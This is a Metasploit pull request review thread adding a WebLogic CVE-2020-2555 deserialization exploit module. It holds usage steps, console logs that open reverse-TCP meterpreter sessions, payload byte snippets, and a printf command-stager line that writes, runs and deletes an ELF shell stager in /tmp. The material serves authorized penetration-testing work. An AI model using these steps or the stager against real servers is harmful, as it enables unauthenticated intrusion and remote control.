Add WebLogic Exploit for CVE-2020-2555
rapid7/metasploit-framework pull request #13463
Opened 2020-05-15 15:23 UTC by space-r7

This adds an exploit module for WebLogic server versions `12.1.3.0`, `12.2.1.3.0`, and `12.2.1.4.0`.

Unauthenticated remote code execution can be achieved by sending a serialized `BadAttributeValueExpException` object over the  T3 protocol to vulnerable WebLogic servers.

## Verification

- [ ] Install the application
- [ ] Start msfconsole
- [ ] Do: ```use exploit/multi/misc/weblogic_deserialize_badattrval```
- [ ] Do: ```set RHOSTS <ip>```
- [ ] Do: ```run```
- [ ] You should get a meterpreter session.

## Scenarios
### WebLogic `v12.1.3.0.0` on Linux
  
  ```
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set target 1
  target => 1
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > set rhosts 172.16.215.196
  rhosts => 172.16.215.196
  msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run

  [*] Started reverse TCP handler on 172.16.215.1:4444
  [*] 172.16.215.196:7001 - WebLogic version detected: 12.1.3.0.0
  [*] 172.16.215.196:7001 - Sending handshake...
  [*] 172.16.215.196:7001 - Formatting payload...
  [*] 172.16.215.196:7001 - Sending object...
  [*] Sending stage (3012516 bytes) to 172.16.215.196
  [*] Meterpreter session 6 opened (172.16.215.1:4444 -> 172.16.215.196:60672) at 2020-05-15 09:41:17 -0500
  [*] 172.16.215.196:7001 - Command Stager progress - 101.36% done (820/809 bytes)

  meterpreter > getuid
  Server username: no-user @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
  meterpreter > sysinfo
  Computer     : 172.16.215.196
  OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  ```

2020-05-19 17:16 UTC, wvu requested changes
Doc changes requested.

2020-05-19 17:16 UTC, wvu-r7 commented on documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
> +  On step 10 of the installation instructions keep the
```suggestion
  On step 10 of the installation instructions, keep the
```

2020-05-19 17:16 UTC, wvu-r7 commented on documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
> +  `Production` or `Development`, click `next`. Click `next` again
```suggestion
  `Production` or `Development`, then click `next`. Click `next` again
```

2020-05-19 17:16 UTC, wvu-r7 commented on documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
> +  `Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/`.
Either...?

2020-05-19 17:16 UTC, wvu-r7 commented on documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
> +### WebLogic `v12.1.3.0.0` on Linux
Please list the distro.

2020-05-19 17:20 UTC, space-r7 commented on documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
> +  `Oracle/Middleware/Oracle_Home/user_projects/domains/base_domain/`.
Ooops, I had originally put both the Linux script path and Windows script path in that section.

2020-05-19 17:24 UTC, wvu requested changes
`info` hash changes requested.

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +  include Exploit::Powershell
```suggestion
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
```

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +      'Name'           => 'Weblogic Deserialize BadAttributeValueExpException',
Deserialize...? Can this title be more descriptive?

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +        over T3 to vulnerable WebLogic servers.
```suggestion
        There exists a Java object deserialization vulnerability
        in multiple versions of WebLogic.

        Unauthenticated remote code execution can be achieved
        by sending a serialized BadAttributeValueExpException object
        over the T3 protocol to vulnerable WebLogic servers.
```

And https://github.com/rapid7/metasploit-framework/pull/13463/files#r427423481.

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +      'Platform'       => %w{ unix linux win },
```suggestion
      'Platform'       => %w[ unix linux win ],
```

https://github.com/rubocop-hq/ruby-style-guide#percent-literal-braces

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +              'Platform'        => %w{ unix linux },
```suggestion
              'Platform'        => %w[ unix linux ],
```

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +              'CmdStagerFlavor' => 'printf',
I don't think this will work on Windows?

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +      'DisclosureDate' => "2020-01-15",
```suggestion
      'DisclosureDate' => '2020-01-15',
```

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +      'Arch'           => [ ARCH_X86, ARCH_X64 ],
Please add `Privileged` info after this.

2020-05-19 17:24 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
Any chance you can use the `AutoCheck` mixin?

2020-05-19 17:34 UTC, wvu reviewed
This code looks remarkably similar to [exploit/multi/misc/weblogic_deserialize](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/weblogic_deserialize.rb)?

2020-05-19 17:34 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    disconnect
This might be best in an `ensure` block.

2020-05-19 17:46 UTC, wvu requested changes
Code changes requested.

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    disconnect
This might be best in an `ensure` on the method.

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    end
```suggestion
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      '99022596d7b45953'
    when Gem::Version.new('12.2.1.3.0')
      'ab2901b976c4e271'
    else
      '954e4590be89865f'
    end
```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    end
```suggestion
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      '889f81b0945d5b7f'
    when Gem::Version.new('12.2.1.3.0')
      '06ee10433a4cc4b4'
    else
      '435b250b72f63db5'
    end
```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    end
```suggestion
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      '658195303e723821'
    when Gem::Version.new('12.2.1.3.0')
      '752289ad4d460138'
    else
      '9b1be18ed70100e5'
    end
```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    end
```suggestion
    case @version_no
    when Gem::Version.new('12.1.3.0.0')
      'ee7ae995c02fb4a2'
    when Gem::Version.new('12.2.1.3.0')
      '87973791b26429dd'
    else
      '1f62f564b951b614'
    end
```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    end
```suggestion
    case @version_no
    when Gem::Version.new('12.2.1.3.0')
      '3'
    else
      '2'
    end
```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    sect = ''
```suggestion
    sect = ''

```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    return sect
```suggestion
    sect
```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    return ''
```suggestion
    ''
```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    formatted_payload = ''
```suggestion
    formatted_payload = ''

```

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    unless check == CheckCode::Appears || datastore['ForceExploit']
`ForceExploit` check should come before `check`. Or you can use the `AutoCheck` mixin, if it's applicable.

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    connect
And the `disconnect`? Not "necessary" but advised.

2020-05-19 17:46 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +  def exploit
Is there a reason your `exploit` method is at the very bottom of this file? Can you move it next to `check` at the top? This is a huge file to scroll through.

2020-05-19 17:48 UTC, wvu requested changes
This PR needs to pass RuboCop.

```
wvu@kharak-STABLE:/rapid7/metasploit-framework:HEAD$ tools/dev/msftidy_docs.rb documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md - [WARNING] Missing Section: ## Options
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md - [WARNING] H2 headings in incorrect order. Should be: Vulnerable Application, Verification Steps, Options, Scenarios
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md:13 - [WARNING] Line too long (141). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md:14 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md:18 - [WARNING] Line too long (143). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md:19 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md:20 - [WARNING] Line too long (144). Consider a newline (which resolves to a space in markdown) to break it up around 140 characters.
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md:21 - [WARNING] Spaces at EOL
documentation/modules/exploit/multi/misc/weblogic_deserialize_badattrval.md:75 - [WARNING] Spaces at EOL
wvu@kharak-STABLE:/rapid7/metasploit-framework:HEAD$ tools/dev/msftidy.rb modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
wvu@kharak-STABLE:/rapid7/metasploit-framework:HEAD$ rubocop modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb | tail -1
.rubocop.yml: Metrics/LineLength has the wrong namespace - should be Layout
/rapid7/metasploit-framework/.rubocop.yml: Warning: no department given for Documentation.
The following cops were added to RuboCop, but are not configured. Please set Enabled to either `true` or `false` in your `.rubocop.yml` file:
 - Layout/EmptyLinesAroundAttributeAccessor (0.83)
 - Layout/SpaceAroundMethodCallOperator (0.82)
 - Lint/RaiseException (0.81)
 - Lint/StructNewOverride (0.81)
 - Style/ExponentialNotation (0.82)
 - Style/HashEachMethods (0.80)
 - Style/HashTransformKeys (0.80)
 - Style/HashTransformValues (0.80)
 - Style/SlicingWithRange (0.83)
For more information: https://docs.rubocop.org/en/latest/versioning/
1 file inspected, 383 offenses detected
wvu@kharak-STABLE:/rapid7/metasploit-framework:HEAD$
```

Also, note the `msftidy_docs` warnings.

2020-05-19 17:49 UTC, space-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +              'CmdStagerFlavor' => 'printf',
How does this section relate to Windows?

2020-05-19 17:50 UTC, wvu-r7 commented
Most of the style issues should be fixed by running `rubocop -a modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb`, btw.

2020-05-19 17:52 UTC, wvu-r7 commented
Feel free to squash/rebase my commits. It'll be noisy otherwise.

2020-05-19 17:53 UTC, space-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +  def exploit
It's just a preference of mine. Will fix

2020-05-19 17:54 UTC, wvu-r7 commented
Beep boop, I'm a bot.

2020-05-19 19:03 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    payload_obj << '74000d' # String, length: 13
🎲 :+1:

2020-05-19 19:03 UTC, wvu submitted a review, later dismissed

2020-05-19 19:03 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +    payload_obj << '3535352e6a617661'
🎲 :+1:

2020-05-19 19:54 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +  def exploit
You don't have to change it! But I think for this particular exploit, it'll be easier on the eyes to move it. Up to you. :)

2020-05-19 19:55 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +              'CmdStagerFlavor' => 'printf',
My bad. I misread it.

2020-05-19 19:57 UTC, wvu-r7 commented on modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb
> +        'Privileged'  => true,
I don't think this gets you privileged access.

2020-05-19 19:58 UTC, wvu-r7 commented
I marked what I could resolved. Can you mark the rest of them?

2020-05-21 04:25 UTC, wvu-r7 commented
Nice work.

```
msf5 exploit(multi/misc/weblogic_deserialize_badattrval) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:7001 - Executing automatic check (disable AutoCheck to override)
[*] 127.0.0.1:7001 - WebLogic version detected: 12.2.1.3.0
[+] 127.0.0.1:7001 - The target appears to be vulnerable.
[*] 127.0.0.1:7001 - Sending handshake...
[*] 127.0.0.1:7001 - Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\1\\2\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/Zqlir ; chmod +x /tmp/Zqlir ; /tmp/Zqlir ; rm -f /tmp/Zqlir"]
[*] 127.0.0.1:7001 - Formatting payload...
[*] 127.0.0.1:7001 - Sending object...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:63852) at 2020-05-20 23:23:02 -0500
[*] 127.0.0.1:7001 - Command Stager progress - 101.56% done (714/703 bytes)

meterpreter > getuid
Server username: no-user @ 7f818332436d (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Red Hat Enterprise Linux 7 (Linux 4.19.76-linuxkit)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```

Tested against https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2018-2894 because I'm lazy. Worked great. A testament to your exploit!

2020-05-21 04:26 UTC, merged

2020-05-22 16:24 UTC, pbarry-r7 commented
## Release Notes

Adds a new module for exploiting a deserialization vulnerability in some versions of WebLogic (CVE-2020-2555).

2020-05-22 16:29 UTC, wvu-r7 commented
Whoops. Thank you, @pbarry-r7!